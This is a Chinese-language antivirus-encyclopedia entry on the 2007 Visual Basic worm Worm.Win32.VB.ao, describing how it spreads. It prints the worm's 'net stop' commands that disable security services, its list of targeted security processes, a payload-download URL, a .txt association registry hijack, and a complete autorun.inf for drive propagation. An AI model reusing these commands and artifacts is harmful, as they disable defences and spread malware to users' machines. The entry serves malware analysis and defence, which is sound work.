這是一個Visual Basic編寫的病毒程式 字串7,病毒一開始會遍歷進程,查找如下進程runiep.exe,ras.exe,MPG4C32.exe,imsins.exe,Iparmor.exe,
基本介紹
- 中文名:Worm.Win32.VB.ao
- 截獲時間:2007-9-04
- 入庫版本:19.39.30
- 類型:蠕蟲
基本信息,傳播過程,安全建議,清除辦法,
基本信息
病毒名稱:Worm.Win32.VB.ao
感染的作業系統:Windows 98, Windows 95, Windows XP, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Windows 2000
傳播級別:高
全球化傳播態勢:中
清除難度:容易
破壞力:高
破壞手段:下載病毒執行
傳播過程
360safe.exe,360tray.exe,kmailmon.exe,
kavstart.exe,clsmn.exe,client.exe,pubwin.exe.。找到後,就直接用TerminateProcess關閉這些安全軟體的進程。
病毒會在%SYSTEM%目錄中釋放alcwzrd.exe,inetres.exe,notep.exe,SoundMan.exe
病毒會執行如下的命令,關閉一些安全軟體的服務,使這些安全軟體失效。
cmd.exe /c net stop shaRedaccess
cmd.exe /c net stop KPfwSvc
cmd.exe /c net stop KWatchsvc
cmd.exe /c net stop McShield
cmd.exe /c net stop "Norton AntiVirUs Server"
cmd.exe /c del %SystemRoot%\system32\updeta.exe
病毒會通過InternetReadFile,從http://www.webyE163.cn/zb/2.txt這個網址上讀取需要下載的檔案列表,然後用URLDownLoadFile按照列表上的地址逐個下載,並保存在本機的%SYSTEM%目錄中,再執行。由於列表網址已經失效,所以我們無法得知需要下載的程式都是什麼。
病毒會修改後綴".txt"的關聯項,使用戶在打開txt檔案的時候就會自動運行病毒,如下:
HKEY_CLASSES_ROOT\txtfile\shell\open\command
\\notep.exe %1
同時這個病毒還有傳播的功能,它會向D糟寫入auto.exe(也就是病毒本身)和autorun.inf,其中autorun.inf內容為:
[AutoRun]
open=auto.exe
shell\Auto\command=auto.exe
shellexecute=auto.exe
shell\open\Command=auto.exe
shell\explore\Command=auto.exe